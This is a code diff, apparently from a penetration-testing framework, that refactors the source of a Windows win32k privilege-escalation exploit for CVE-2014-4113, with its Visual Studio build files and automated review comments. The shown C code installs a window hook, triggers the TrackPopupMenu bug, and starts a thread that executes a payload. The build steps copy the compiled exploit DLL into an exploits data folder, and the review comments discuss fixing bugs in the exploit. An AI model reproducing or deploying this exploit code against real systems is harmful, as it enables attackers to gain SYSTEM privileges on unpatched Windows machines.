- if (SetWindowsHookExA(WH_CALLWNDPROC, HookCallback, NULL, GetCurrentThreadId()) == NULL) {
- LogMessage("[!] SetWindowsHookExA failed :-(\n");
- DestroyMenu(MenuTwo);
- DestroyMenu(MenuOne);
+ if (SetWindowsHookExA(WH_CALLWNDPROC, hook_callback, NULL, GetCurrentThreadId()) == NULL)
+ {
+ dprintf("[!] SetWindowsHookExA failed :-(");
+ DestroyMenu(hMenuTwo);
+ DestroyMenu(hMenuOne);
 return;
 }
 // 'crash' it!
- TrackPopupMenu(MenuTwo, 0, -10000, -10000, 0, hWnd, NULL);
+ TrackPopupMenu(hMenuTwo, 0, -10000, -10000, 0, hWnd, NULL);
 // If everything worked process should be privileges at this point
- LogMessage("[!] Executing payload...");
- CreateThread(0, 0, ExecutePayload, lpPayload, 0, NULL);
- return;
+ dprintf("[!] Executing payload...");
+ CreateThread(0, 0, execute_payload, lpPayload, 0, NULL);
 }
-BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved) {
+BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved)
+{
 BOOL bReturnValue = TRUE;
- switch (dwReason) {
+ switch (dwReason)
+ {
 case DLL_QUERY_HMODULE:
 hAppInstance = hinstDLL;
- if (lpReserved != NULL) {
+ if (lpReserved != NULL)
+ {
 *(HMODULE *)lpReserved = hAppInstance;
 }
 break;
 case DLL_PROCESS_ATTACH:
 hAppInstance = hinstDLL;
- Win32kNullPage(lpReserved);
+ win32k_null_page(lpReserved);
 break;
 case DLL_PROCESS_DETACH:
 case DLL_THREAD_ATTACH:
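Review bot: `if (szNtName == NULL)` in `win32k_null_page` compares a local array against NULL, so it can never be true and the rename simply carries the original's dead check forward; when no `nt*.exe` entry is found in the module list, `pNtBase` (declared without an initializer in this hunk) is fed into the `pPsLookupProcessByProcessId` rebasing arithmetic and `LoadLibraryA(szNtName)` is called with an empty name. Initialising `PVOID pNtBase = NULL;` and testing `if (pNtBase == NULL)` makes the "nt not found" exit actually fire. Two smaller points in the same function: the `dprintf` calls that print `pNtBase` and `hNtKrnl` still use `%08x`, which is a varargs mismatch and truncates on x64 while the `pPsLookupProcessByProcessId` line a few l lines later already switched to `0x%p`, and `pSystemInfoBuffer` from `LocalAlloc` is never freed on any path. `hNtKrnl` is also not checked before `GetProcAddress`, though the NULL check right after it covers the common failure.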
@@ -487,4 +496,4 @@ BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved) {
 break;
 }
 return bReturnValue;
-};
+}
diff --git a/external/source/exploits/cve-2014-4113/cve-2014-4113/cve-2014-4113.vcxproj b/external/source/exploits/cve-2014-4113/cve-2014-4113/cve-2014-4113.vcxproj
index fe5f68951d..8988c99265 100755
--- a/external/source/exploits/cve-2014-4113/cve-2014-4113/cve-2014-4113.vcxproj
+++ b/external/source/exploits/cve-2014-4113/cve-2014-4113/cve-2014-4113.vcxproj
@@ -1,5 +1,5 @@  - + Debug
@@ -19,132 +19,224 @@ - {6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B} - cve20144113 + {E80F11CD-6698-492F-B4B0-1A2348A24BB0} + cve-2014-4113 + Win32Proj - - DynamicLibrary - true - false - MultiByte - v120 - - - DynamicLibrary - true - false - MultiByte - v120 - DynamicLibrary - false - false MultiByte - v120 + false + v120_xp DynamicLibrary - false - false MultiByte - v120 + false + v120_xp + + + DynamicLibrary + MultiByte + v120_xp + + + DynamicLibrary + MultiByte + v120_xp + - - - - - - - - - - + - - ../../../ReflectiveDLLInjection/common;$(IncludePath) - - - ../../../ReflectiveDLLInjection/common;$(IncludePath) - - - ../../../ReflectiveDLLInjection/common;$(IncludePath) - - - ../../../ReflectiveDLLInjection/common;$(IncludePath) + + <_ProjectFileVersion>10.0.30319.1 + $(Configuration)\$(Platform)\ + $(Configuration)\$(Platform)\ + false + false + AllRules.ruleset + + + $(ProjectName).$(PlatformShortName) - CompileAsC - Level3 Disabled - true - true - MultiThreaded + ..\..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories) + WIN32;_DEBUG;_WINDOWS;_USRDLL;CVE_2014_4113_EXPORTS;%(PreprocessorDefinitions) + true + EnableFastChecks + MultiThreadedDebug + + + Level3 + true + Mpr.lib;%(AdditionalDependencies) + %(AdditionalLibraryDirectories) + %(DelayLoadDLLs) true - true - $(OutDir)$(TargetName).$(ProcessorArchitecture)$(TargetExt) + Windows + MachineX86 + + + /ignore:4070 + + editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL +exit 0 + + + _DEBUG;_USING_V110_SDK71_;%(PreprocessorDefinitions) + - CompileAsC - Level3 Disabled - true - true - MultiThreaded + ..\..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories) + WIN32;_DEBUG;_WINDOWS;_USRDLL;CVE_2014_4113_EXPORTS;%(PreprocessorDefinitions) + EnableFastChecks + MultiThreadedDebug + + + Level3 + true + Mpr.lib;%(AdditionalDependencies) + %(AdditionalLibraryDirectories) + %(DelayLoadDLLs) true - true - 
$(OutDir)$(TargetName).$(ProcessorArchitecture)$(TargetExt) + Windows + + + /ignore:4070 + + editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL +exit 0 + + + _DEBUG;_USING_V110_SDK71_;%(PreprocessorDefinitions) + - CompileAsC - Level3 - Disabled - true - true - Default + MinSpace + OnlyExplicitInline + false + ..\..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories) + WIN32;NDEBUG;_WINDOWS;_USRDLL;CVE_2014_4113_EXPORTS;%(PreprocessorDefinitions) + true MultiThreaded + false + + + $(OutDir)\ + $(OutDir)\ + $(OutDir)\ + Level3 + ProgramDatabase + false + Size + true + Mpr.lib;%(AdditionalDependencies) + %(AdditionalLibraryDirectories) + false + %(IgnoreSpecificDefaultLibraries) + %(DelayLoadDLLs) false - true - $(OutDir)$(TargetName).$(ProcessorArchitecture)$(TargetExt) + true + $(OutDir)\cve-2014-4113.map + Windows + + + + + false + + + $(OutDir)\cve-2014-4113.lib + MachineX86 + false + + + /ignore:4070 + + editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL +IF EXIST "..\..\..\..\..\data\exploits\CVE-2014-4113\" GOTO COPY + mkdir "..\..\..\..\..\data\exploits\CVE-2014-4113\" +:COPY +copy /y "$(TargetDir)$(TargetFileName)" "..\..\..\..\..\data\exploits\CVE-2014-4113\" + - CompileAsC - Level3 - Disabled - true - true - Default + MinSpace + OnlyExplicitInline + false + ..\..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories) + WIN32;NDEBUG;_WINDOWS;_USRDLL;CVE_2014_4113_EXPORTS;%(PreprocessorDefinitions) + true MultiThreaded + false + + + $(OutDir)\ + $(OutDir)\ + $(OutDir)\ + Level3 + ProgramDatabase + false + Size + true + Mpr.lib;%(AdditionalDependencies) + %(AdditionalLibraryDirectories) + false + %(IgnoreSpecificDefaultLibraries) + %(DelayLoadDLLs) false - true - $(OutDir)$(TargetName).$(ProcessorArchitecture)$(TargetExt) + true + $(OutDir)\cve-2014-4113.map + Windows + + + + + false + + + $(OutDir)\cve-2014-4113.lib + false + + + /ignore:4070 + + 
editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.01 "$(TargetDir)$(TargetFileName)" > NUL +IF EXIST "..\..\..\..\..\data\exploits\CVE-2014-4113\" GOTO COPY + mkdir "..\..\..\..\..\data\exploits\CVE-2014-4113\" +:COPY +copy /y "$(TargetDir)$(TargetFileName)" "..\..\..\..\..\data\exploits\CVE-2014-4113\" + + \ No newline at end of file diff --git a/external/source/exploits/cve-2014-4113/make.msbuild b/external/source/exploits/cve-2014-4113/make.msbuild index c0690660ff..3292289649 100755 --- a/external/source/exploits/cve-2014-4113/make.msbuild +++ b/external/source/exploits/cve-2014-4113/make.msbuild @@ -4,14 +4,15 @@ .\cve-2014-4113.sln - + - + - + + diff --git a/external/source/exploits/make.bat b/external/source/exploits/make.bat index 4884810d07..fb39b2e3c5 100755 --- a/external/source/exploits/make.bat +++ b/external/source/exploits/make.bat @@ -48,7 +48,7 @@ IF "%ERRORLEVEL%"=="0" ( ) IF "%ERRORLEVEL%"=="0" ( - ECHO "Building CVE-2014-4113 (win32k_null_page)" + ECHO "Building CVE-2014-4113 (track_popup_menu)" PUSHD CVE-2014-4113 msbuild.exe make.msbuild /target:%PLAT% POPD
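Review bot: The post-build steps in the two Debug configurations end with `exit 0` after `editbin.exe ... > NUL`, so a missing or failing editbin leaves the DLL with whatever subsystem version the linker wrote and the build still reports success; the Release steps drop the `exit 0` but keep the `> NUL`. Removing both lets a failed editbin fail the build, which matters here because the same post-build step then copies the artifact straight into `data/exploits/CVE-2014-4113/`: `editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)"`. Since that copy is what produced the two checked-in DLLs in this commit, a sentence in the commit message saying they were rebuilt from this source with the v120_xp toolset would make the binaries auditable. The x86 and x64 Release steps pass different minimum subsystem versions (4.0 vs 5.01), presumably intentional, but a comment next to each saying why would save the next reader a guess.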